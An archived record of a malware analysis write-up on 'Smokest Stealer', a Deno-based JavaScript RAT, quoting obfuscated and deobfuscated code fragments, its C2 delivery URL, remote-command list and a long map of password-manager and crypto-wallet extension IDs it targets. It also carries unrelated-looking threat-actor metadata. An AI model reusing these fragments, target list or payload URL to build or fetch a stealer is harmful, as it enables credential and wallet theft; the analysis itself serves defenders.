{ "id": "2b1a124b-ae6c-42e5-b92d-a55e229405a3", "created_at": "2026-04-06T00:10:06.46868Z", "updated_at": "2026-04-10T13:13:07.155679Z", "deleted_at": null, "sha1_hash": "c5ccb72393f779cbb24a1c3359527bb871fce8ba", "title": "Smokest Stealer, a new malware family? Maybe? | malware source code", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 110311, "plain_text": "Smokest Stealer, a new malware family? Maybe? | malware source\r\ncode\r\nPublished: 2026-01-18 · Archived: 2026-04-05 23:48:02 UTC\r\n⌘Ctrlk\r\n1. My Projects\r\n2. Write-ups\r\nSmokest Stealer, a new malware family? Maybe?\r\ntl;dr tl;dr multi-functionality RAT written in Deno JavaScript, oligomorphic mutation, lots of stuff it targets,\r\nfriends online deobfuscated it. Deobfuscated code:\r\nhttps://gist.github.com/vxunderground/48a67e51b375b74be953511b9082f732\r\nJanuary 16th, 2025, MalwareHunterTeam on Twitter noted\r\nthe discovery of an unusual malware payload titled \"topwebcomicsv1.msi\"\r\nAfter reviewing some of it's functionality on VirusTotal, he noted the malicious sample makes a GET request to:\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 1 of 10\n\nhttp://sharecodepro.com/m/8752e5472b9a3a80/main\r\nThe URL contains a polymorphic JavaScript payload which relies on the Deno\r\n JavaScript runtime. This is fairly unusual, as noted by both\r\nMalwareHunterTeam and myself. I personally cannot recall a time I saw a malware payload using this. Have you?\r\nWhen you make a GET request you'll notice that on each invocation it does indeed mutate. However, the mutation\r\nit uses primarily revolves around variable naming conventions. The core underlying logic does not change. It is\r\nmore akin to oligomorphic mutation rather polymorphic\r\nmutation.\r\nPreviously I shared on Twitter I strongly dislike deobfuscating malicious JavaScript payloads, subsequent to this\r\npost several malware degenerates popped out the bushes volunteered, unironically, to de-obfuscating it just for the\r\nlove of game . Hence, security researcher nullVoidPtr\r\n spent her weekend de-obfuscating various malicious\r\nJavaScript payloads because ???\r\nLet's look at it now.\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 2 of 10\n\nFirst and foremost, each GET request to their C2 delivery URL can demonstrate clear as day their mutation\r\ncharacteristics. It also illustrates how primitive it is. Here is the first couple of lines which we can see change on\r\neach GET request:\r\nconst _0x224b90 = _0x64fd;\r\n(function (_0x4f1d5e, _0x16bc75) {\r\n const _0x456e6a = _0x64fd, _0x1f1eea = _0x4f1d5e();\r\n while (!![]) {\r\n try {\r\n const _0x435a48 = parseInt(_0x456e6a(0x2a9)) / 0x1 + -parseInt(_0x456e6a(0x851)) / 0x2 * (-parseInt(\r\n if (_0x435a48 === _0x16bc75)\r\n break;\r\n else\r\n _0x1f1eea['push'](_0x1f1eea['shift']());\r\n } catch (_0x1c340a) {\r\n _0x1f1eea['push'](_0x1f1eea['shift']());\r\n }\r\n }\r\nconst _0x2e9caa = _0xd76d;\r\n(function (_0x546e7d, _0xd59c8b) {\r\n const _0x121f79 = _0xd76d, _0x32b19d = _0x546e7d();\r\n while (!![]) {\r\n try {\r\n const _0x1df090 = -parseInt(_0x121f79(0x873)) / 0x1 + parseInt(_0x121f79(0x3ef)) / 0x2 * (parseInt(_\r\n if (_0x1df090 === _0xd59c8b)\r\n break;\r\n else\r\n _0x32b19d['push'](_0x32b19d['shift']());\r\n } catch (_0x37c848) {\r\n _0x32b19d['push'](_0x32b19d['shift']());\r\n }\r\n }\r\nconst _0x551d5a = _0x52d0;\r\n(function (_0x4ed655, _0x1047c3) {\r\n const _0x2b4e43 = _0x52d0, _0x37975e = _0x4ed655();\r\n while (!![]) {\r\n try {\r\n const _0x1c86b8 = -parseInt(_0x2b4e43(0xaf9)) / 0x1 * (-parseInt(_0x2b4e43(0x8c1)) / 0x2) + parseInt\r\n if (_0x1c86b8 === _0x1047c3)\r\n break;\r\n else\r\n _0x37975e['push'](_0x37975e['shift']());\r\n } catch (_0x297fde) {\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 3 of 10\n\n_0x37975e['push'](_0x37975e['shift']());\r\n }\r\n }\r\nAs you can see, despite the code changing, the core functionality remains the same. This is classic oligomorphic\r\nmutation (not quite hash busting, but pretty damn close )\r\nWhen you de-obfuscate the malicious payload (courtesy of nullVoidPtr, I didn't want to deal with it) it unveils a\r\nrather large JavaScript stealer. It totals 8,448 lines of code even with a JavaScript beautifier.\r\nThe entry point is located on line 8,351.\r\nIt makes invocations to console.log ... but it doesn't appear anything is modified in the code base to pipe the output\r\nto nothing (???).\r\nThe first function call, initializeClient(), builds strings for the malicious domain sharecodepro.com and determines\r\nif the URL is active. However, to my surprise, it appears it does not contain any functionality to handle the URL\r\nnot being active. In the event the C2 is dead the code is basically dead in the water. However, with the URL split\r\ncode segment it APPEARS the author might INTEND to have multiple domains in the event one is dead. That is\r\nnot present (yet?).\r\ninitializeClient also invokes the function hc() (speculatively thinking \"HTTP Client\" function?) which builds basic\r\nfunctionality for GET, POST, and WS (Web Socket).\r\nFollowing the client initialization Smokest creates a mutex to ensure the payload only rules once. This is standard\r\nbefore.\r\nFollowing this, Smokest creates a unique set of properties to identify the machine by invoking the function\r\ngetHuidMd5. De-obfuscated it looks like this:\r\nfunction getHuidMd5() {\r\n return crypto.createHash('md5')\r\n .update(\r\n '' +\r\n os.userInfo().username +\r\n os.hostname() +\r\n os.totalmem() +\r\n os.version() +\r\n new Set(os.cpus().map(cpu =\u003e cpu.model.trim()))\r\n )\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 4 of 10\n\n.digest(\"hex\");\r\n}\r\nThis is used as a unique identifier for the infected host. It used in several other places in the code base for the\r\nsocket connection and initial registration with the C2:\r\nconsole.log(\r\n \"Token: \" +\r\n \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW1wYWlnbklkIjoiNzVjYmUxODY1M2Q1MjM3MiIsImNhbXBhaWduTmFtZSI6IlNtb2tl\r\n .substring(0x0, 0x14) +\r\n \"...\"\r\n);\r\nThe logged token (which is used elsewhere for registration) is a JWT (Json Web Token) which can be decoded\r\npretty easily. JWT is Base64 encoded like this:\r\nBASE64URL(header) . BASE64URL(payload) . BASE64URL(signature)\r\nWhen Base64 decoded with Powershell:\r\n[Text.Encoding]::UTF8.GetString(\r\n [Convert]::FromBase64String(\r\n \"eyJjYW1wYWlnbklkIjoiNzVjYmUxODY1M2Q1MjM3MiIsImNhbXBhaWduTmFtZSI6IlNtb2tlc3QiLCJjYW1wYWlnblVybCI6InNtb2tlc3Q\r\n )\r\n)\r\nWe get this:\r\n{\r\n \"campaignId\": \"75cbe18653d52372\",\r\n \"campaignName\": \"Smokest\",\r\n \"campaignUrl\": \"smokest\",\r\n \"configId\": \"8752e5472b9a3a80\",\r\n \"proxies\": [\"http://sharecodepro.com\"],\r\n \"userId\": \"bb47c0615477a877\",\r\n \"userNote\": \"topwebcomics\",\r\n \"iat\": 1768623552,\r\n \"exp\": 2084199552\r\n}\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 5 of 10\n\nIAT being \"Issued At\" and EXP being \"expired\" in Unix timestamp (seconds since January 1st, 1970UTC) we get:\r\niat: 1768623552\r\n2026-01-17 05:39:12 UTC\r\nexp: 2084199552\r\n2036-01-16 05:39:12 UTC\r\nIAT of 2026-01-17 05:39:12 UTC is when I pulled the payload from the sharecodepro. Hence, in the future, we\r\ncan use the IAT to determine when a host was infected.\r\nThankfully, and for reasons I still don't understand, the author of Smokest left us plenty of clues as to what it is\r\ndoing and what it will do next. Here is the console.log invocations (with the middle stuff removed)\r\nconsole.log(\"HUID MD5: \" + _0x1ff8b4);\r\nconsole.log(\"Token: \" + \"\" + \"...\");\r\nconsole.log(\"API URLs: \" + _0x269364.join(',\\x20'));\r\nconsole.log(\"Collecting system info...\");\r\nconsole.log(\"System info collected:\", _0x22c231);\r\nconsole.log(\"Creating WebSocket connection...\");\r\nconsole.log(\"WebSocket created, waiting for connection...\");\r\nconsole.log(\"Connected to server\");\r\n console.error(\"Failed to send PTY output:\", _0x1ced93);\r\nconsole.log(\"Registration message sent\");\r\n console.error(\"Failed to send registration:\", _0xb3a21c);\r\n console.error(\"Keylogger stopped:\", _0x4fc9b4);\r\n console.error(\"Clipboard logger stopped:\", _0x2b6a89);\r\nconsole.log(\"Disconnected from server. Code: \" + _0xc8bd03.code + \", Reason: \" + _0xc8bd03.reason);\r\n console.error(\"Unexpected message type:\", typeof _0x58def6.data);\r\n console.error(\"Error handling message:\", _0x51c326);\r\nconsole.log(\"Event listeners registered, keeping process alive...\");\r\nThe author unironically gave us a tl;dr on what it's going to do, indirectly giving us a step-by-step on what to\r\nexpect\r\nI guess now we can just reverse engineer the individual functions because now we see the flow control...\r\nreturn {\r\n username,\r\n hostname,\r\n domain,\r\n osName,\r\n osVersion,\r\n osBuild,\r\n platform,\r\n osType,\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 6 of 10\n\nosRelease,\r\n cpus,\r\n gpus,\r\n ramMb,\r\n avs,\r\n runningAsAdmin,\r\n hasAdminRights\r\n};\r\nThe fingerprinting and identification it uses is pretty standard. Some of it derives from Deno, some of it uses the\r\nWINAPI.\r\nfunction getHostname() {\r\n try {\r\n if (Deno?.[\"env\"]?.['get'](\"COMPUTERNAME\") || import_node_process3[\"default\"].env.COMPUTERNAME) {\r\n return true;\r\n }\r\n return import_node_os2[\"default\"].hostname();\r\n } catch {\r\n return void 0x0;\r\n }\r\n}\r\nfunction getDomain() {\r\n if (!kernel324) {\r\n return void 0x0;\r\n }\r\n try {\r\n const _0x1c2352 = 0x100,\r\n _0x4ffd39 = new Uint16Array(_0x1c2352),\r\n _0x316a05 = new Uint32Array([_0x1c2352]),\r\n _0x1e5187 = kernel324.symbols.GetComputerNameExW(0x2, _0x4ffd39, _0x316a05);\r\n if (_0x1e5187 !== 0x0 \u0026\u0026 _0x316a05[0x0] \u003e 0x0) {\r\n const _0x3222f3 = new TextDecoder(\"utf-16le\"),\r\n _0x3108b9 = _0x3222f3.decode(new Uint8Array(_0x4ffd39.buffer, 0x0, _0x316a05[0x0] * 0x2));\r\n if (_0x3108b9) {\r\n return _0x3108b9;\r\n }\r\n return void 0x0;\r\n }\r\n } catch (_0x80f5f8) {\r\n console.warn(\"Failed to get domain:\", _0x80f5f8);\r\n }\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 7 of 10\n\nreturn void 0x0;\r\n}\r\nYou can see the invocation to Kernel32!GetComputerNameExW. Why did they name is Kernel324? I have no\r\nidea.\r\nSubsequently, Smokest uses User32!GetAsyncKeyState for keylogging and exfiltrates data using\r\nsendCommand2().\r\nRegardless, Smokest does contain a bit of interesting functionality. One of the event listeners it establishes allows\r\ncommands to be sent and received.\r\ncase \"screenshot\":\r\ncase \"powershell-command\":\r\ncase \"pty-start\":\r\ncase \"pty-input\":\r\ncase \"pty-resize\":\r\ncase \"pty-stop\":\r\ncase \"socks5-connect\":\r\ncase \"socks5-data\":\r\ncase \"socks5-close\":\r\ncase \"list-drives\":\r\ncase \"list-files\":\r\ncase \"download-file-from-agent\":\r\ncase \"delete-file\":\r\ncase \"upload-file-to-agent\":\r\ncase \"stealer\":\r\ncase \"execute\":\r\nReverse engineering all of this individual commands would take a bit of time, and I've already lost interest in this\r\nmalware sample. I am actually impressed by it's mutation-like features, how many features are present in Smokest,\r\nand it's (current) low detection score on VirusTotal. It using Deno is also an interesting strategy.\r\nVery cool.\r\nThe author clearly put quite a bit of effort into the stealer functionality. While it primarily targets Chromium\r\napplications, the author has targeted probably every cryptocurrency wallet (and password manager) on the planet\r\n(I'm being hyperbolic... or maybe not, I'm not sure).\r\n _0x3e9f72.set(\"Authenticator\", \"bhghoamapcdpbohphigoooaddinpkbai\");\r\n _0x3e9f72.set(\"EOSAuthenticator\", \"oeljdldpnmdbchonielidgobddffflal\");\r\n _0x3e9f72.set(\"Bitwarden\", \"nngceckbapebfimnlniiiahkandclblb\");\r\n _0x3e9f72.set(\"KeePassXC\", \"oboonakemofpalcgghocfoadofidjkkk\");\r\n _0x3e9f72.set(\"Dashlane\", \"fdjamakpfbbddfjaooikfcpapjohcfmg\");\r\n _0x3e9f72.set(\"1Password\", \"aeblfdkhhhdcdjpifhhbdiojplfjncoa\");\r\n _0x3e9f72.set(\"NordPass\", \"fooolghllnmhmmndgjiamiiodkpenpbb\");\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 8 of 10\n\n_0x3e9f72.set(\"Keeper\", \"bfogiafebfohielmmehodmfbbebbbpei\");\r\n _0x3e9f72.set(\"RoboForm\", \"pnlccmojcmeohlpggmfnbbiapkmbliob\");\r\n _0x3e9f72.set(\"LastPass\", \"hdokiejnpimakedhajhdlcegeplioahd\");\r\n _0x3e9f72.set(\"BrowserPass\", \"naepdomgkenhinolocfifgehidddafch\");\r\n _0x3e9f72.set(\"MYKI\", \"bmikpgodpkclnkgmnpphehdgcimmided\");\r\n _0x3e9f72.set(\"Splikity\", \"jhfjfclepacoldmjmkmdlmganfaalklb\");\r\n _0x3e9f72.set(\"CommonKey\", \"chgfefjpcobfbnpmiokfjjaglahmnded\");\r\n _0x3e9f72.set(\"ZohoVault\", \"igkpcodhieompeloncfnbekccinhapdb\");\r\n _0x3e9f72.set(\"NortonPasswordManager\", \"admmjipmmciaobhojoghlmleefbicajg\");\r\n _0x3e9f72.set(\"AviraPasswordManager\", \"caljgklbbfbcjjanaijlacgncafpegll\");\r\n _0x3e9f72.set(\"TrezorPasswordManager\", \"imloifkgjagghnncjkhggdhalmcnfklk\");\r\n _0x3e9f72.set(\"MetaMask\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\");\r\n _0x3e9f72.set(\"MetaMask_edge\", \"ejbalbakoplchlghecdalmeeeajnimhm\");\r\n _0x3e9f72.set(\"TronLink\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\");\r\n _0x3e9f72.set(\"BinanceChain\", \"fhbohimaelbohpjbbldcngcnapndodjp\");\r\n _0x3e9f72.set(\"Coin98\", \"aeachknmefphepccionboohckonoeemg\");\r\n _0x3e9f72.set(\"iWallet\", \"kncchdigobghenbbaddojjnnaogfppfj\");\r\n _0x3e9f72.set(\"Wombat\", \"amkmjjmmflddogmhpjloimipbofnfjih\");\r\n _0x3e9f72.set(\"MEWCX\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\");\r\n _0x3e9f72.set(\"NeoLine\", \"cphhlgmgameodnhkjdmkpanlelnlohao\");\r\n _0x3e9f72.set(\"TerraStation\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\");\r\n _0x3e9f72.set(\"Keplr\", \"dmkamcknogkgcdfhhbddcghachkejeap\");\r\n _0x3e9f72.set(\"Sollet\", \"fhmfendgdocmcbmfikdcogofphimnkno\");\r\n _0x3e9f72.set(\"ICONex\", \"flpiciilemghbmfalicajoolhkkenfel\");\r\n _0x3e9f72.set('KHC', \"hcflpincpppdclinealmandijcmnkbgn\");\r\n _0x3e9f72.set(\"TezBox\", \"mnfifefkajgofkcjkemidiaecocnkjeh\");\r\n _0x3e9f72.set(\"Byone\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\");\r\n _0x3e9f72.set(\"OneKey\", \"infeboajgfhgbjpjbeppbkgnabfdkdaf\");\r\n _0x3e9f72.set(\"DAppPlay\", \"lodccjjbdhfakaekdiahmedfbieldgik\");\r\n _0x3e9f72.set(\"BitClip\", \"ijmpgkjfkbfhoebgogflfebnmejmfbml\");\r\n _0x3e9f72.set(\"SteemKeychain\", \"lkcjlnjfpbikmcmbachjpdbijejflpcm\");\r\n _0x3e9f72.set(\"NashExtension\", \"onofpnbbkehpmmoabgpcpmigafmmnjhl\");\r\n _0x3e9f72.set(\"HyconLiteClient\", \"bcopgchhojmggmffilplmbdicgaihlkp\");\r\n _0x3e9f72.set(\"ZilPay\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\");\r\n _0x3e9f72.set(\"LeafWallet\", \"cihmoadaighcejopammfbmddcmdekcje\");\r\n _0x3e9f72.set(\"CyanoWallet\", \"dkdedlpgdmmkkfjabffeganieamfklkm\");\r\n _0x3e9f72.set(\"CyanoWalletPro\", \"icmkfkmjoklfhlfdkkkgpnpldkgdmhoe\");\r\n _0x3e9f72.set(\"NaboxWallet\", \"nknhiehlklippafakaeklbeglecifhad\");\r\n _0x3e9f72.set(\"PolymeshWallet\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\");\r\n _0x3e9f72.set(\"NiftyWallet\", \"jbdaocneiiinmjbjlgalhcelgbejmnid\");\r\n _0x3e9f72.set(\"LiqualityWallet\", \"kpfopkelmapcoipemfendmdcghnegimn\");\r\n _0x3e9f72.set(\"MathWallet\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\");\r\n _0x3e9f72.set(\"CoinbaseWallet\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\");\r\n _0x3e9f72.set(\"CloverWallet\", \"nhnkbkgjikgcigadomkphalanndcapjk\");\r\n _0x3e9f72.set(\"Yoroi\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\");\r\n _0x3e9f72.set(\"Guarda\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\");\r\n _0x3e9f72.set(\"EQUALWallet\", \"blnieiiffboillknjnepogjhkgnoapac\");\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 9 of 10\n\n_0x3e9f72.set(\"BitAppWallet\", \"fihkakfobkmkjojpchpfgcmhfjnmnfpi\");\r\n _0x3e9f72.set(\"AuroWallet\", \"cnmamaachppnkjgnildpdmkaakejnhae\");\r\n _0x3e9f72.set(\"SaturnWallet\", \"nkddgncdjgjfcddamfgcmfnlhccnimig\");\r\n _0x3e9f72.set(\"RoninWallet\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\");\r\n _0x3e9f72.set(\"Exodus\", \"aholpfdialjgjfhomihkjbmgjidlcdno\");\r\n _0x3e9f72.set(\"MaiarDeFiWallet\", \"dngmlblcodfobpdpecaadgfbcggfjfnm\");\r\n _0x3e9f72.set(\"Nami\", \"lpfcbjknijpeeillifnkikgncikgfhdo\");\r\n _0x3e9f72.set(\"Eternl\", \"kmhcihpebfmpgmihbkipmjlmmioameka\");\r\n _0x3e9f72.set(\"PhantomWallet\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\");\r\n _0x3e9f72.set(\"TrustWallet\", \"egjidjbpglichdcondbcbdnbeeppgdph\");\r\nLast updated 2 months ago\r\nSource: https://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nhttps://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://malwaresourcecode.com/home/my-projects/write-ups/smokest-stealer-a-new-malware-family-maybe" ], "report_names": [ "smokest-stealer-a-new-malware-family-maybe" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434206, "ts_updated_at": 1775826787, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c5ccb72393f779cbb24a1c3359527bb871fce8ba.pdf", "text": "https://archive.orkl.eu/c5ccb72393f779cbb24a1c3359527bb871fce8ba.txt", "img": "https://archive.orkl.eu/c5ccb72393f779cbb24a1c3359527bb871fce8ba.jpg" } }